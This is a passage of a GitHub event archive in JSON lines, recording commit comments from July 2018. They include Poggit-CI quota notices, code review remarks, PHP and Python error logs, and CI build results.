GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T04:10:43Z"}
{"id":"8007716000","type":"CommitCommentEvent","actor":{"login":"Navyakarnat"},"repo":{"name":"Navyakarnat/ProximaCare"},"payload":{"comment":{"id":29808628,"position":null,"line":null,"path":null,"commit_id":"ef0aeaa52a9588da6d09f9bc41bc04f05b8b0890","created_at":"2018-07-24T04:10:44Z","updated_at":"2018-07-24T04:10:44Z","author_association":"OWNER","body":"TestData"}},"created_at":"2018-07-24T04:10:44Z"}
{"id":"8007717595","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaShop2"},"payload":{"comment":{"id":29808629,"position":null,"line":null,"path":null,"commit_id":"433f982744ee07aa3ddb72a47fda08dd62769758","created_at":"2018-07-24T04:11:25Z","updated_at":"2018-07-24T04:11:25Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaShop2/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `a0922ab4-8ef7-11e8-90a5-0011fb95aec6`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T04:11:25Z"}
{"id":"8007718153","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29808631,"position":null,"line":null,"path":null,"commit_id":"4b45181656db870940dd177825ec2a7a4dc120ec","created_at":"2018-07-24T04:11:39Z","updated_at":"2018-07-24T04:11:39Z","author_association":"MEMBER","body":"* There's a non-ASCII quote on line 33.\r\n* It'd be nice if the file was PEP8 compliant.\r\n* When I try running it with Python3 I get this traceback. Works fine with Py2.\r\n```python\r\nTraceback (most recent call last):\r\n  File \"util/dump-font.py\", line 5, in <module>\r\n    from psautohint.autohint import ACFontError, ACOptions, openFile\r\n  File \"psautohint/python/psautohint/__init__.py\", line 8, in <module>\r\n    from . import _psautohint\r\nImportError: dlopen(psautohint/python/psautohint/_psautohint.so, 2): Symbol not found: _PyString_Type\r\n  Referenced from: psautohint/python/psautohint/_psautohint.so\r\n  Expected in: flat namespace\r\n in psautohint/python/psautohint/_psautohint.so\r\n```"}},"created_at":"2018-07-24T04:11:39Z"}
{"id":"8007720698","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaShop2"},"payload":{"comment":{"id":29808636,"position":null,"line":null,"path":null,"commit_id":"29fe867b3a86664431aa8f6d950ed56a485ce7a9","created_at":"2018-07-24T04:12:47Z","updated_at":"2018-07-24T04:12:47Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaShop2/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `d151df78-8ef7-11e8-9cfe-bf2b89f1788d`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T04:12:47Z"}
{"id":"8007728055","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29808645,"position":1,"line":null,"path":"1532405752.44/github_test.txt","commit_id":"fed44b11836675214e35f617a4c9b8387648d7b8","created_at":"2018-07-24T04:15:54Z","updated_at":"2018-07-24T04:15:54Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-24T04:15:54Z"}
{"id":"8007732966","type":"CommitCommentEvent","actor":{"login":"chandu1792"},"repo":{"name":"chandu1792/developing"},"payload":{"comment":{"id":29808655,"position":23,"line":23,"path":"2.sh","commit_id":"843f668879c740382113794a82d2e3564f925311","created_at":"2018-07-24T04:17:59Z","updated_at":"2018-07-24T04:17:59Z","author_association":"OWNER","body":"helo chandu"}},"created_at":"2018-07-24T04:17:59Z"}
{"id":"8007742179","type":"CommitCommentEvent","actor":{"login":"moonshadow565"},"repo":{"name":"LeagueSandbox/GameServer"},"payload":{"comment":{"id":29808665,"position":24,"line":133,"path":"GameServerLib/Logic/Game.cs","commit_id":"f6f5a79973253ba6b74b2ee0fd697627af8e6923","created_at":"2018-07-24T04:21:46Z","updated_at":"2018-07-24T04:21:46Z","author_association":"MEMBER","body":"Might want to use format strings here.\r\nAlso should pull key and port from game config."}},"created_at":"2018-07-24T04:21:46Z"}
{"id":"8007745514","type":"CommitCommentEvent","actor":{"login":"wlhdxloli"},"repo":{"name":"wlhdxloli/token-profile"},"payload":{"comment":{"id":29808671,"position":null,"line":null,"path":null,"commit_id":"e65401bc559cc7f393d793a3e6f199944710c0f8","created_at":"2018-07-24T04:23:09Z","updated_at":"2018-07-24T04:23:09Z","author_association":"OWNER","body":"Add KUMC token."}},"created_at":"2018-07-24T04:23:09Z"}
{"id":"8007746610","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29808675,"position":36,"line":36,"path":"net/mtxclient/Portfile","commit_id":"ba8db93756a3be2eb656c44b15db482107947a2a","created_at":"2018-07-24T04:23:34Z","updated_at":"2018-07-24T04:23:34Z","author_association":"CONTRIBUTOR","body":"Are you certain that libressl would not work instead? If you are certain, then add a comment to the portfile indicating what the problem was. If you are not certain, write the dependency as `path:lib/libssl.dylib:openssl` so that libressl could satisfy it."}},"created_at":"2018-07-24T04:23:34Z"}
{"id":"8007763675","type":"CommitCommentEvent","actor":{"login":"acro2"},"repo":{"name":"udacity/create-your-own-adventure"},"payload":{"comment":{"id":29808710,"position":1,"line":1,"path":"albanian/avion/avion.md","commit_id":"19747e7d73164a419776858c4c1c236432c10341","created_at":"2018-07-24T04:30:33Z","updated_at":"2018-07-24T04:30:33Z","author_association":"NONE","body":"Please, replace \"Udhetime\" with \"Udhetimi\" for grammatically correct sentence in Albanian"}},"created_at":"2018-07-24T04:30:33Z"}
{"id":"8007766969","type":"CommitCommentEvent","actor":{"login":"MatthewFrench"},"repo":{"name":"LeagueSandbox/GameServer"},"payload":{"comment":{"id":29808711,"position":24,"line":133,"path":"GameServerLib/Logic/Game.cs","commit_id":"f6f5a79973253ba6b74b2ee0fd697627af8e6923","created_at":"2018-07-24T04:31:55Z","updated_at":"2018-07-24T04:31:55Z","author_association":"CONTRIBUTOR","body":"Added."}},"created_at":"2018-07-24T04:31:55Z"}
{"id":"8007773541","type":"CommitCommentEvent","actor":{"login":"SurendiranNK"},"repo":{"name":"SurendiranNK/Phone_tool"},"payload":{"comment":{"id":29808713,"position":null,"line":null,"path":null,"commit_id":"722a7276a9803c592df69b69a7624725d5007389","created_at":"2018-07-24T04:34:40Z","updated_at":"2018-07-24T04:34:40Z","author_association":"OWNER","body":"Check upload"}},"created_at":"2018-07-24T04:34:40Z"}
{"id":"8007774682","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808715,"position":4,"line":526,"path":"Module/Convert.Main/Functions.PowerStigXml.ps1","commit_id":"fd6680092521ca532634e07365d97575c4ce1871","created_at":"2018-07-24T04:35:10Z","updated_at":"2018-07-24T04:35:10Z","author_association":"OWNER","body":"This benchmark Id accounts for newer versions of the SQL STIGs."}},"created_at":"2018-07-24T04:35:10Z"}
{"id":"8007778160","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808723,"position":23,"line":573,"path":"Module/Convert.Main/Functions.PowerStigXml.ps1","commit_id":"fd6680092521ca532634e07365d97575c4ce1871","created_at":"2018-07-24T04:36:35Z","updated_at":"2018-07-24T04:36:35Z","author_association":"OWNER","body":"Modified naming to maintain consistency with already processed Active Directory STIGs"}},"created_at":"2018-07-24T04:36:35Z"}
{"id":"8007780082","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808725,"position":27,"line":576,"path":"Module/Convert.Main/Functions.PowerStigXml.ps1","commit_id":"fd6680092521ca532634e07365d97575c4ce1871","created_at":"2018-07-24T04:37:24Z","updated_at":"2018-07-24T04:37:24Z","author_association":"OWNER","body":"Removed underscore to account for IE10 benchark Id"}},"created_at":"2018-07-24T04:37:24Z"}
{"id":"8007780120","type":"CommitCommentEvent","actor":{"login":"cliffordjefferies"},"repo":{"name":"cliffordjefferies/haxe"},"payload":{"comment":{"id":29808726,"position":null,"line":null,"path":null,"commit_id":"2b0aee4fa6f95f4b67b4360e79ec03c10b349e99","created_at":"2018-07-24T04:37:25Z","updated_at":"2018-07-24T04:37:25Z","author_association":"OWNER","body":"Fix for issue #7299 - Lua file handle leak for sys.io.Process()\r\n\r\nVerified on the generated Lua but not from a build. I'm still working on getting the build to work at all."}},"created_at":"2018-07-24T04:37:25Z"}
{"id":"8007781462","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29808729,"position":6,"line":45,"path":"Module/Stig.TechnologyRole/Stig.TechnologyRole.psm1","commit_id":"fd6680092521ca532634e07365d97575c4ce1871","created_at":"2018-07-24T04:37:57Z","updated_at":"2018-07-24T04:37:57Z","author_association":"OWNER","body":"Added technology roles for Windows 10 and Server 2016"}},"created_at":"2018-07-24T04:37:57Z"}
{"id":"8007781768","type":"CommitCommentEvent","actor":{"login":"BhavinGolakiya"},"repo":{"name":"timotheus/ebaysdk-python"},"payload":{"comment":{"id":29808730,"position":null,"line":null,"path":null,"commit_id":"b357af5924858176999706cc7631214e2df48dea","created_at":"2018-07-24T04:38:04Z","updated_at":"2018-07-24T04:38:04Z","author_association":"NONE","body":"how can i getmembermessage in ebay api using python?"}},"created_at":"2018-07-24T04:38:04Z"}
{"id":"8007784713","type":"CommitCommentEvent","actor":{"login":"moonshadow565"},"repo":{"name":"LeagueSandbox/GameServer"},"payload":{"comment":{"id":29808736,"position":null,"line":null,"path":null,"commit_id":"793f7b11b6fe37a1934d7a3aa2aec558faf9583b","created_at":"2018-07-24T04:39:19Z","updated_at":"2018-07-24T04:39:19Z","author_association":"MEMBER","body":"First argument group is used for communication with the launcher and can be left empty.\r\nYou are writing address/port in the wrong group (last group should be used)."}},"created_at":"2018-07-24T04:39:19Z"}
{"id":"8007785543","type":"CommitCommentEvent","actor":{"login":"Shadowss"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29808740,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T04:39:39Z","updated_at":"2018-07-24T04:39:39Z","author_association":"OWNER","body":"Good morning and thanks for continue supporting this project.\r\n\r\nReceive blank page in Admin panel\r\n\r\nHere is the error_log\r\n\r\n[24-Jul-2018 07:37:58 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:02 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:03 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:03 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:03 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:04 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:04 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:04 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:04 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:05 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:05 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:06 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:06 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:21 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:22 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n[24-Jul-2018 07:38:23 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5"}},"created_at":"2018-07-24T04:39:39Z"}
{"id":"8007789518","type":"CommitCommentEvent","actor":{"login":"ravlya02"},"repo":{"name":"ravlya02/MyProject"},"payload":{"comment":{"id":29808745,"position":3,"line":3,"path":"Test1","commit_id":"56399c738b76397704ec5d92451bc0e445d222b5","created_at":"2018-07-24T04:41:17Z","updated_at":"2018-07-24T04:41:17Z","author_association":"OWNER","body":"Wish"}},"created_at":"2018-07-24T04:41:17Z"}
{"id":"8007790271","type":"CommitCommentEvent","actor":{"login":"ravlya02"},"repo":{"name":"ravlya02/MyProject"},"payload":{"comment":{"id":29808746,"position":null,"line":null,"path":null,"commit_id":"56399c738b76397704ec5d92451bc0e445d222b5","created_at":"2018-07-24T04:41:36Z","updated_at":"2018-07-24T04:41:36Z","author_association":"OWNER","body":"Wish Added"}},"created_at":"2018-07-24T04:41:36Z"}
{"id":"8007791540","type":"CommitCommentEvent","actor":{"login":"shahzadlone"},"repo":{"name":"g/grizzly_robot"},"payload":{"comment":{"id":29808749,"position":63,"line":63,"path":"grizzly_base/src/grizzly_diagnostic_updater.cpp","commit_id":"ae7a2c0e3990b87d6b31c4de4a6f0d98c36c2623","created_at":"2018-07-24T04:42:09Z","updated_at":"2018-07-24T04:42:09Z","author_association":"NONE","body":"Does this get deleted?"}},"created_at":"2018-07-24T04:42:09Z"}
{"id":"8007795914","type":"CommitCommentEvent","actor":{"login":"kageiit"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":29808756,"position":null,"line":null,"path":null,"commit_id":"80ae8c35d9d9a19dee1367e7ed90f54c5a4ecae9","created_at":"2018-07-24T04:43:59Z","updated_at":"2018-07-24T04:43:59Z","author_association":"CONTRIBUTOR","body":"can we make it info?"}},"created_at":"2018-07-24T04:43:59Z"}
{"id":"8007800725","type":"CommitCommentEvent","actor":{"login":"Nhatriss"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808782,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T04:45:57Z","updated_at":"2018-07-24T04:45:57Z","author_association":"NONE","body":"Great project"}},"created_at":"2018-07-24T04:45:57Z"}
{"id":"8007803665","type":"CommitCommentEvent","actor":{"login":"Shadowss"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29808819,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T04:47:10Z","updated_at":"2018-07-24T04:47:10Z","author_association":"OWNER","body":"Also problem appear in Treasury : [24-Jul-2018 07:46:44 Europe/Bucharest] PHP Parse error:  syntax error, unexpected 'const' (T_CONST), expecting variable (T_VARIABLE) in /home/outlet/public_html/shadowss.ro/travian/GameEngine/Artifacts.php on line 5\r\n"}},"created_at":"2018-07-24T04:47:10Z"}
{"id":"8007808844","type":"CommitCommentEvent","actor":{"login":"xiyi8580"},"repo":{"name":"xiyi8580/Algorithms-design-and-analysis-Standford"},"payload":{"comment":{"id":29808826,"position":null,"line":null,"path":null,"commit_id":"910825dc1d357916efd17685fd83b423fe73be78","created_at":"2018-07-24T04:49:23Z","updated_at":"2018-07-24T04:49:23Z","author_association":"OWNER","body":"Tested Version"}},"created_at":"2018-07-24T04:49:23Z"}
{"id":"8007811364","type":"CommitCommentEvent","actor":{"login":"hungnduet"},"repo":{"name":"hungnduet/anlab"},"payload":{"comment":{"id":29808833,"position":null,"line":null,"path":null,"commit_id":"3d14f3e9211176d490d9f2fb5c4b1beb4e683527","created_at":"2018-07-24T04:50:27Z","updated_at":"2018-07-24T04:50:27Z","author_association":"OWNER","body":"giaodien va giaithuat"}},"created_at":"2018-07-24T04:50:27Z"}
{"id":"8007811432","type":"CommitCommentEvent","actor":{"login":"wupeijiang"},"repo":{"name":"Jack-Cherish/python-spider"},"payload":{"comment":{"id":29808834,"position":null,"line":null,"path":null,"commit_id":"3c5480d4a187265c0884f5e20019e854150ed306","created_at":"2018-07-24T04:50:29Z","updated_at":"2018-07-24T04:50:29Z","author_association":"NONE","body":"big god!!"}},"created_at":"2018-07-24T04:50:29Z"}
{"id":"8007827827","type":"CommitCommentEvent","actor":{"login":"emas99"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808870,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T04:57:14Z","updated_at":"2018-07-24T04:57:14Z","author_association":"NONE","body":"Very nice project"}},"created_at":"2018-07-24T04:57:14Z"}
{"id":"8007828141","type":"CommitCommentEvent","actor":{"login":"miklos1"},"repo":{"name":"coneoproject/COFFEE"},"payload":{"comment":{"id":29808871,"position":null,"line":null,"path":null,"commit_id":"5a64937a5e3c841b78f4a73322319702ab58cd71","created_at":"2018-07-24T04:57:22Z","updated_at":"2018-07-24T04:57:22Z","author_association":"CONTRIBUTOR","body":"I don't desire it, it was probably a cheap fix for not parenthesising complex numbers, but that has to be tested first."}},"created_at":"2018-07-24T04:57:22Z"}
{"id":"8007834478","type":"CommitCommentEvent","actor":{"login":"malcolmjr96"},"repo":{"name":"iDev-Network/Project-Ventura"},"payload":{"comment":{"id":29808883,"position":null,"line":null,"path":null,"commit_id":"809ee2338b33fbe1747227c2ed57c0ead33cbc0c","created_at":"2018-07-24T05:00:00Z","updated_at":"2018-07-24T05:00:00Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Basic Movement setup](https://trello.com/c/Y83iavxY/2-basic-movement-setup)"}},"created_at":"2018-07-24T05:00:00Z"}
{"id":"8007838039","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29808894,"position":5,"line":612,"path":"Keyed/Misc_Gameplay.xml","commit_id":"1787c82ca9dc5c94f9c10413894f47f9206c656b","created_at":"2018-07-24T05:01:16Z","updated_at":"2018-07-24T05:01:16Z","author_association":"CONTRIBUTOR","body":"Hey @mora145 en realidad es la energía sobrante lo que marca allí, puedes comprobarlo en un circuito básico en el juego, pero te muestro uno en discord."}},"created_at":"2018-07-24T05:01:16Z"}
{"id":"8007839266","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29808896,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-24T05:01:44Z","updated_at":"2018-07-24T05:01:44Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-24T05:01:44Z"}
{"id":"8007840854","type":"CommitCommentEvent","actor":{"login":"malcolmjr96"},"repo":{"name":"iDev-Network/Project-Ventura"},"payload":{"comment":{"id":29808902,"position":null,"line":null,"path":null,"commit_id":"494f352e56dee5152267fa63976e8f5dac025fd5","created_at":"2018-07-24T05:02:22Z","updated_at":"2018-07-24T05:02:22Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Advanced Movement Setup](https://trello.com/c/CfKBJXMb/1-advanced-movement-setup)"}},"created_at":"2018-07-24T05:02:22Z"}
{"id":"8007841012","type":"CommitCommentEvent","actor":{"login":"miffycs"},"repo":{"name":"hgao3/Trio"},"payload":{"comment":{"id":29808903,"position":null,"line":null,"path":null,"commit_id":"b7f3c00a5b920f886ecfa20e95aa4cc728c1da5b","created_at":"2018-07-24T05:02:26Z","updated_at":"2018-07-24T05:02:26Z","author_association":"COLLABORATOR","body":"* correction: @signin not @signup"}},"created_at":"2018-07-24T05:02:26Z"}
{"id":"8007842045","type":"CommitCommentEvent","actor":{"login":"malcolmjr96"},"repo":{"name":"iDev-Network/Project-Ventura"},"payload":{"comment":{"id":29808907,"position":null,"line":null,"path":null,"commit_id":"2b1da0f8e322475a50e911e6918ed2f4b47762e6","created_at":"2018-07-24T05:02:52Z","updated_at":"2018-07-24T05:02:52Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Basic Movement setup](https://trello.com/c/Y83iavxY/2-basic-movement-setup)"}},"created_at":"2018-07-24T05:02:52Z"}
{"id":"8007842680","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29808908,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-24T05:03:09Z","updated_at":"2018-07-24T05:03:09Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T05:03:09Z"}
{"id":"8007842915","type":"CommitCommentEvent","actor":{"login":"malcolmjr96"},"repo":{"name":"iDev-Network/Project-Ventura"},"payload":{"comment":{"id":29808909,"position":null,"line":null,"path":null,"commit_id":"8ac7f67ed49b891c984a7c8d81bcb8cfeb849f0d","created_at":"2018-07-24T05:03:15Z","updated_at":"2018-07-24T05:03:15Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [tileset creation](https://trello.com/c/fnwANDfn/18-tileset-creation)"}},"created_at":"2018-07-24T05:03:15Z"}
{"id":"8007844612","type":"CommitCommentEvent","actor":{"login":"engineer135"},"repo":{"name":"engineer135/project-euler"},"payload":{"comment":{"id":29808919,"position":null,"line":null,"path":null,"commit_id":"4b23255c3143936b90abbb831c4740f1c1e34377","created_at":"2018-07-24T05:03:57Z","updated_at":"2018-07-24T05:03:57Z","author_association":"OWNER","body":"백만년만에 풀어본 거 같다. 결국 답을 보고 해결했다는게 함정...\r\n분발해야겠다."}},"created_at":"2018-07-24T05:03:57Z"}
{"id":"8007844821","type":"CommitCommentEvent","actor":{"login":"akshaychanna"},"repo":{"name":"akshaychanna/git_demo"},"payload":{"comment":{"id":29808921,"position":null,"line":null,"path":null,"commit_id":"7d9f8dc8eb9a9ac10132315852733ef15782df69","created_at":"2018-07-24T05:04:02Z","updated_at":"2018-07-24T05:04:02Z","author_association":"OWNER","body":"this is sub file"}},"created_at":"2018-07-24T05:04:02Z"}
{"id":"8007848757","type":"CommitCommentEvent","actor":{"login":"VicMP0"},"repo":{"name":"Unity-Technologies/ml-agents"},"payload":{"comment":{"id":29808930,"position":null,"line":null,"path":null,"commit_id":"5859862c00192cda66bc5e44a0c8606ee0a9d114","created_at":"2018-07-24T05:05:43Z","updated_at":"2018-07-24T05:05:43Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-24T05:05:43Z"}
{"id":"8007848900","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29808931,"position":null,"line":null,"path":null,"commit_id":"f857e84031b5c1024597015958646180c65997c9","created_at":"2018-07-24T05:05:47Z","updated_at":"2018-07-24T05:05:47Z","author_association":"CONTRIBUTOR","body":"Buenos cambios."}},"created_at":"2018-07-24T05:05:47Z"}
{"id":"8007849039","type":"CommitCommentEvent","actor":{"login":"hellhaus"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808932,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T05:05:49Z","updated_at":"2018-07-24T05:05:49Z","author_association":"NONE","body":"Hi nice Project "}},"created_at":"2018-07-24T05:05:49Z"}
{"id":"8007850456","type":"CommitCommentEvent","actor":{"login":"gpenghe"},"repo":{"name":"tldr-pages/tldr-node-client"},"payload":{"comment":{"id":29808940,"position":null,"line":null,"path":null,"commit_id":"395a4aec062a43e253896604a5bec2ae7c205ef8","created_at":"2018-07-24T05:06:25Z","updated_at":"2018-07-24T05:06:25Z","author_association":"CONTRIBUTOR","body":"Well, now I see I stubbed reset instead of intended get :(. Don’t know why it works in my test. Will fix it tomorrow..."}},"created_at":"2018-07-24T05:06:25Z"}
